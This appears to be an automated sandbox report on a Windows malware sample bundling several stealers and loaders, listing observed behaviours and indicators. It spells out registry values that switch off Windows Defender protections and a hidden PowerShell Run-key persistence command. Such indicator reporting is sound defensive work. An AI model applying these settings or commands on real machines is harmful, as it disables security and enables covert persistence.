Malware Analysis Report

2025-08-05 16:12

Sample ID 231026-hcw6tseb57
Target f66b2258a70968303673ee418b5d5307.exe
SHA256 c79258569f98eb2be24996d902fcf73bc6aef9d50600591c2b9a818107cfd3e9
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

c79258569f98eb2be24996d902fcf73bc6aef9d50600591c2b9a818107cfd3e9

Threat Level: Known bad

The file f66b2258a70968303673ee418b5d5307.exe was found to be: Known bad.

Malicious Activity Summary

Detect ZGRat V1

DcRat

Raccoon

Glupteba payload

ZGRat

SmokeLoader

Glupteba

Raccoon Stealer payload

RedLine

RedLine payload

Amadey

Modifies Windows Defender Real-time Protection settings

Modifies boot configuration data using bcdedit

Stops running service(s)

Modifies Windows Firewall

Downloads MZ/PE file

Possible attempt to disable PatchGuard

Windows security modification

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Checks SCSI registry key(s)

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-26 06:36

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-26 06:36

Reported

2023-10-26 06:38

Platform

win7-20231023-en

Max time kernel

81s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Glupteba

loader dropper glupteba

Glupteba payload

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\F136.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED7B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F00D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FEBF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4A62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5932.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\458F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5932.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\F136.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\EC81.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\483F.exe'\"" C:\Users\Admin\AppData\Local\Temp\483F.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\FEBF.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS6E5D.tmp\Install.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{12317FF1-73CA-11EE-A123-5AAA8EBA5435} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\F136.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FEBF.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1140 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2740 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe
PID 1380 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED7B.exe
PID 1380 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED7B.exe
PID 1380 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED7B.exe
PID 1380 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\ED7B.exe
PID 1380 wrote to memory of 2528 N/A N/A C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 2528 N/A N/A C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 2528 N/A N/A C:\Windows\system32\cmd.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2740 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\EC81.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 2452 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 1380 wrote to memory of 2440 N/A N/A C:\Users\Admin\AppData\Local\Temp\F00D.exe
PID 1380 wrote to memory of 2440 N/A N/A C:\Users\Admin\AppData\Local\Temp\F00D.exe
PID 1380 wrote to memory of 2440 N/A N/A C:\Users\Admin\AppData\Local\Temp\F00D.exe
PID 1380 wrote to memory of 2440 N/A N/A C:\Users\Admin\AppData\Local\Temp\F00D.exe
PID 1380 wrote to memory of 796 N/A N/A C:\Users\Admin\AppData\Local\Temp\F136.exe
PID 1380 wrote to memory of 796 N/A N/A C:\Users\Admin\AppData\Local\Temp\F136.exe
PID 1380 wrote to memory of 796 N/A N/A C:\Users\Admin\AppData\Local\Temp\F136.exe
PID 1380 wrote to memory of 796 N/A N/A C:\Users\Admin\AppData\Local\Temp\F136.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 1400 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 240 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
